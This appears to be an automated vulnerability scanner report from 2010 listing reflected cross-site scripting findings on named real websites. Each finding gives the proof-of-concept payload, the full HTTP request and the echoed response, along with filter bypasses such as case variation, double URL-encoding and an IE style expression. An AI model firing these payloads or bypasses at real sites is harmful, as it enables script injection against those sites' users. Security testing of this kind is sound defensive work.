The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /article/info:doi/10.1371/journal.pone.0015502?39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054=1 HTTP/1.1 Host: www.plosone.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:42:40 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: JSESSIONID=F914DB9D7DBEA2B6B0FBDEF21F1F6B1A.ambra02; Path=/; HttpOnly Cache-Control: max-age=1 Expires: Sun, 21 Nov 2010 21:42:41 GMT Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: Coyote-2-95144505=9514450e:0; path=/ Content-Length: 117546
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmln ...[SNIP]... <a href="/article/metrics/info%3Adoi%2F10.1371%2Fjournal.pone.0015502&39652"><ScRiPt>alert(1)</ScRiPt>5b9f319d054=1;jsessionid=F914DB9D7DBEA2B6B0FBDEF21F1F6B1A.ambra02" title="More information"> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 7ba2f<script>alert(1)</script>f778b5fc1b2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUs7ba2f<script>alert(1)</script>f778b5fc1b2 HTTP/1.1 Host: www.plusmo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:42:54 GMT Server: Apache/2.2.6 (Fedora) Connection: close Content-Type: text/html; charset=UTF8 Content-Length: 10485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <span>RSS Feed http://feeds.feedburner.com/DeloitteUs7ba2f<script>alert(1)</script>f778b5fc1b2</span> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c45c"><script>alert(1)</script>0b34d28b590 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUs2c45c"><script>alert(1)</script>0b34d28b590 HTTP/1.1 Host: www.plusmo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:42:52 GMT Server: Apache/2.2.6 (Fedora) Connection: close Content-Type: text/html; charset=UTF8 Content-Length: 10503
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta name="description" content="RSS Feed http://feeds.feedburner.com/DeloitteUs2c45c"><script>alert(1)</script>0b34d28b590 Mobile Widget on Plusmo"/> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as text between TITLE tags. The payload e5aa6</title><script>alert(1)</script>8a11b8b567b was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUse5aa6</title><script>alert(1)</script>8a11b8b567b HTTP/1.1 Host: www.plusmo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:42:56 GMT Server: Apache/2.2.6 (Fedora) Connection: close Content-Type: text/html; charset=UTF8 Content-Length: 10557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <title>RSS Feed http://feeds.feedburner.com/DeloitteUse5aa6</title><script>alert(1)</script>8a11b8b567b Mobile Widget Preview</title> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43dd6"%3balert(1)//b9efb08da3e was submitted in the c parameter. This input was echoed as 43dd6";alert(1)//b9efb08da3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /s.asp?c=5389959443dd6"%3balert(1)//b9efb08da3e&u=6122467569 HTTP/1.1 Host: www.pollmonkey.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:43:28 GMT X-Powered-By: ASP.NET pragma: No-cache cache-control: private Content-Length: 366 Content-Type: application/x-javascript Expires: Mon, 30 Nov 2009 21:43:28 GMT Set-Cookie: ASPSESSIONIDQQTDSCCB=LCECPIMAEBBMMKBPLNCFFPHJ; path=/ Cache-control: no-cache Connection: close X-Powered-By: Bananas and Rum X-Monkey-Sign: Screaming Monkeys
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcbc"><a>edcc746ee30 was submitted in the REST URL parameter 1. This input was echoed as cbcbc\"><a>edcc746ee30 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /rss.xmlcbcbc"><a>edcc746ee30 HTTP/1.1 Host: www.primidi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:43:38 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 10173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Rss.xmlcbcbc ...[SNIP]... <meta name="Keywords" content="rss.xmlcbcbc\"><a>edcc746ee30, www.primidi.com, rss.xmlcbcbc"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf2b<a>42170eff543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /rss.xml1cf2b<a>42170eff543 HTTP/1.1 Host: www.primidi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:43:51 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 10548
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Rss.xml1cf2b ...[SNIP]... <H1>Rss.xml1cf2b<a>42170eff543 Topics</H1> ...[SNIP]...
1.399. http://www.rockpapershotgun.com/2010/11/17/solving-biowares-code-shattered-steel/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66267"><script>alert(1)</script>39ce2832c2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66267\"><script>alert(1)</script>39ce2832c2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/17/solving-biowares-code-shattered-steel/?66267"><script>alert(1)</script>39ce2832c2b=1 HTTP/1.1 Host: www.rockpapershotgun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:39:27 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Cookie X-Pingback: http://www.rockpapershotgun.com/xmlrpc.php Link: <http://www.rockpapershotgun.com/?p=44231>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 160780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
1.400. http://www.sega.com/games/sonic-colors/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sega.com
Path:
/games/sonic-colors/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056b"><script>alert(1)</script>63b683099ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056b\"><script>alert(1)</script>63b683099ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /games/sonic-colors/?2056b"><script>alert(1)</script>63b683099ea=1 HTTP/1.1 Host: www.sega.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; c ...[SNIP]... <a href="?t=EnglishUK&gseoid=sonic-colors&2056b\"><script>alert(1)</script>63b683099ea=1" title="EnglishUK" class="EnglishUK"> ...[SNIP]...
1.401. http://www.shacknews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shacknews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d710b"><script>alert(1)</script>a4009f59791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d710b"><script>alert(1)</script>a4009f59791=1 HTTP/1.1 Host: www.shacknews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.402. http://www.slashgear.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slashgear.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743dc"><script>alert(1)</script>69628aaf259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 743dc\"><script>alert(1)</script>69628aaf259 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?743dc"><script>alert(1)</script>69628aaf259=1 HTTP/1.1 Host: www.slashgear.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:37:21 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.3.3 X-Pingback: http://www.slashgear.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Content-Length: 60815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <a href="http://www.slashgear.com/page/2/?743dc\"><script>alert(1)</script>69628aaf259=1" title="Page 2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9915d<script>alert(1)</script>865802b6e3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vacation-package9915d<script>alert(1)</script>865802b6e3a/ HTTP/1.1 Host: www.smartertravel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h ...[SNIP]... </strong> http://www.smartertravel.com/vacation-package9915d<script>alert(1)</script>865802b6e3a/</p> ...[SNIP]...
1.404. http://www.streettech.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.streettech.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7491"><script>alert(1)</script>d8bc78cd73a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f7491"><script>alert(1)</script>d8bc78cd73a=1 HTTP/1.1 Host: www.streettech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:37:22 GMT Server: Apache Cache-Control: cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/4.4.9 Set-Cookie: POSTNUKESID=8d450e776a2abf344184057d2c046269; expires=Thu, 22 Nov 2035 03:37:22 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 84688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Street Tech :: hardware beyond the hype</t ...[SNIP]... <input type="hidden" name="url" value="/?f7491"><script>alert(1)</script>d8bc78cd73a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc443"><script>alert(1)</script>04c0df10c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fc443"><script>alert(1)</script>04c0df10c73 HTTP/1.1 Host: www.streettech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 21:37:18 GMT Server: Apache Content-Length: 2328 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.streettech.com/fc443"><script>alert(1)</script>04c0df10c73"> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f21"style%3d"x%3aexpression(alert(1))"a1c6f3f5039 was submitted in the url parameter. This input was echoed as 56f21"style="x:expression(alert(1))"a1c6f3f5039 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /submit?url=http://www.wired.com/underwire/2010/11/deathly-hallows-fans/56f21"style%3d"x%3aexpression(alert(1))"a1c6f3f5039&title=5+Things+%3Ccite%3EHarry+Potter%3C%2Fcite%3E+Fans+Will+Fight+Over+in+%3Ccite%3EDeathly+Hallows%3C%2Fcite%3E+Film HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7b890%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7259bff540 was submitted in the REST URL parameter 2. This input was echoed as 7b890</title><script>alert(1)</script>d7259bff540 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/SkinnyJeans7b890%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7259bff540/ HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <title>SkinnyJeans7b890</title><script>alert(1)</script>d7259bff540 - Articles and Posts from StyleList</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 265aa%253cscript%253ealert%25281%2529%253c%252fscript%253eb55c61c1ed5 was submitted in the REST URL parameter 2. This input was echoed as 265aa<script>alert(1)</script>b55c61c1ed5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/SkinnyJeans265aa%253cscript%253ealert%25281%2529%253c%252fscript%253eb55c61c1ed5/ HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c79"-alert(1)-"1949e52f475 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/SkinnyJeans76c79"-alert(1)-"1949e52f475/ HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... + " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/tag/SkinnyJeans76c79"-alert(1)-"1949e52f475/"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10563%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6320e29c59a was submitted in the REST URL parameter 2. This input was echoed as 10563\"><script>alert(1)</script>6320e29c59a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/SkinnyJeans10563%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6320e29c59a/ HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta name="description" content="Posts about SkinnyJeans10563\"><script>alert(1)</script>6320e29c59a on StyleList" /> ...[SNIP]...
1.411. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/tag/SkinnyJeans/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87744"-alert(1)-"a1efa8aff4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/SkinnyJeans/?87744"-alert(1)-"a1efa8aff4b=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/tag/SkinnyJeans/?87744"-alert(1)-"a1efa8aff4b=1"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
1.412. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/tag/SkinnyJeans/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c344"><script>alert(1)</script>2198164e8fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/SkinnyJeans/?8c344"><script>alert(1)</script>2198164e8fd=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/tag/SkinnyJeans/?8c344"><script>alert(1)</script>2198164e8fd=1" /> ...[SNIP]...
1.413. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daf6"><script>alert(1)</script>c9747c416fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7daf6"><script>alert(1)</script>c9747c416fe=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:37:36 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:52:36 GMT;path=/
1.414. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b5c'-alert(1)-'66c1d2b16c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a3b5c'-alert(1)-'66c1d2b16c1=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:37:47 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:52:48 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a3b5c'-alert(1)-'66c1d2b16c1=1" rel="nofollow"> ...[SNIP]...
1.415. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f1769--><script>alert(1)</script>c134d7b2996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?f1769--><script>alert(1)</script>c134d7b2996=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:38:09 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:53:09 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&f1769--><script>alert(1)</script>c134d7b2996=1#" rel="nofollow"> ...[SNIP]...
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 7784f<script>alert(1)</script>2c6f007e0c6 was submitted in the key parameter. This input was echoed unmodified in the application's response.
